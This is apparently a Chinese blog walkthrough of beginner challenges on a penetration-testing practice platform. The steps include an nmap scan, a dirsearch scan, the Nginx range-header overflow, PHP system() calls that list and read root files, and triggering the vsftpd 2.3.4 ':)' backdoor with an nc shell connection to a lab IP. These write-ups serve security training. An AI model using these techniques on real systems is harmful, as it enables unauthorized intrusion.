【安鸾渗透实战平台】安全基础/( 全 | 通关 )

BurpSuite抓包


1. 浏览器访问,burp抓包,得到flag文件
在这里插入图片描述
2. 访问flag文件,拿到flag在这里插入图片描述
在这里插入图片描述

指纹识别


1. 下载whatweb

# 更新软件包
apt-get update
# 下载whatweb
apt-get install whatweb

2. 使用whatweb进行指纹识别, 拿到flag

whatweb http://47.100.220.113:8009/

在这里插入图片描述
在这里插入图片描述

Nginx整数溢出漏洞


1. 访问/proxy/demo.png
在这里插入图片描述

在这里插入图片描述
2. burp抓包,构造一个range头,在返回包中可看到flag
在这里插入图片描述
在这里插入图片描述

PHP代码基础


1. 查看根目录, 发现flag文件 || 点击左上角保存键运行代码

<?php
system("ls /");

在这里插入图片描述
2. 查看文件内容, 拿到flag

# * 为通配符, 匹配任意内容
<?php
system("cat /this_is_flag*.txt");

在这里插入图片描述

在这里插入图片描述

Linux基础命令


1. finalshell 连接主机
在这里插入图片描述
2. 查找所有文件名中含有flag的文件

find / -name "*flag*"

在这里插入图片描述
3. 查看文件内容, 拿到一半flag

cat /home/test/.this_is_flag

在这里插入图片描述
4. 根据提示, 查找文件

find / -name "*Jiuyin-Sutra-Volume-2*"

在这里插入图片描述
5. 查看文件内容,拿到另一半flag

cat /usr/games/.Jiuyin-Sutra-Volume-2

在这里插入图片描述

在这里插入图片描述

Mysql数据库基础


1. 使用Navicat连接数据库, 使用SSH隧道
在这里插入图片描述
在这里插入图片描述
2. 查看whalwl库、flag表的flag字段, 拿到flag
在这里插入图片描述

在这里插入图片描述

目录扫描


1. 使用目录扫描工具爆破目录,使用提供的字典 | 请求方式设置为HEAD | 我使用的是dirsearch

dirsearch -u http://47.100.220.113:8008/ -w d:\dicc.txt -e php -t 1 -m head

在这里插入图片描述
2. 扫描的源码,访问下载解压, 发现flag文件
在这里插入图片描述
3. 查看文件内容,拿到flag
在这里插入图片描述

在这里插入图片描述

端口扫描


1. 经典的笑脸后门 | 根据提示扫描端口,扫描到vsftpd2.3.4(笑脸后门特征)

nmap -Pn -p 10021 -sV 47.100.220.113

在这里插入图片描述
在这里插入图片描述
2. ftp连接,用户名带有:) ,密码任意 | [使用第二组,第一组无法复现]

# 按以下顺序输入
ftp
open 47.100.220.113 20021
aaa:)
aaa

在这里插入图片描述

3. nc连接所给的后门端口 | whoami测试是否拿到shell

nc 47.100.220.113 26200
whoami

在这里插入图片描述
在这里插入图片描述

4. 查看当前目录, 发现flag文件

ls

在这里插入图片描述
5. 查看文件内容,得到flag

cat this_is_flag

在这里插入图片描述

在这里插入图片描述

Docker容器基础


1. docker拉取镜像

sudo docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test

在这里插入图片描述

2. 查看镜像

sudo docker images

在这里插入图片描述
3. 启动镜像并查看

sudo docker run -it -d fbe61513a072
sudo docker ps

在这里插入图片描述
4. 命令行方式进入镜像

sudo docker exec -it 0d31b81c8e65 /bin/bash

在这里插入图片描述
5. 查找flag文件

find / -name "*flag*"

在这里插入图片描述
6. 查看文件内容, 拿到flag

cat /root/this_is_flag

在这里插入图片描述

在这里插入图片描述

文件类型


1. 下载文件,解压三次
在这里插入图片描述
在这里插入图片描述

2. 找一个在线识别文件格式的网站,识别第一个
在这里插入图片描述
3. 图片,修改后缀为.jpg,拿到flag-1
在这里插入图片描述
4. 识别第二个文件
在这里插入图片描述
5. 注意到一个exe,后缀改成exe,命令行运行,拿到flag-2

.\flag-2.exe

在这里插入图片描述
6. 识别flag-3 ,未知
在这里插入图片描述
7. 用记事本打开看一下内容,以ELF开头,应该时ELF文件(Linux可执行文件)
在这里插入图片描述
8. 拖到linux上运行,拿到flag-3

# 加可执行权限
chmod +x flag-3
# 执行
./flag-3 

在这里插入图片描述
9. 识别flag-4
在这里插入图片描述
10. 还是.exe,运行一下,出现报错
在这里插入图片描述

11. 根据报错可判断出使用python访问本机的8888端口,用nc监听下8888端口,再启动exe

# 终端1
nc -lvnp 8888

在这里插入图片描述

# 终端2
.\flag-4.exe

在这里插入图片描述
12. 终端1收到http报文
在这里插入图片描述
13. 随意输入内容回车,报错
在这里插入图片描述
14. 根据报错推测要构造一个状态码为200的返回包, 拿到flag-4

HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Mon, 21 Nov 2022 08:39:06 GMT
Age: 14252
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Connection: close

success

在这里插入图片描述
在这里插入图片描述
15. 识别flag-5,zip文件,解压出来
在这里插入图片描述
在这里插入图片描述
16. .class文件,丢进jd反编译下,拿到flag-5
在这里插入图片描述
17. 将flag-1 ~ flag-5 拼接得到最终flag
在这里插入图片描述

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值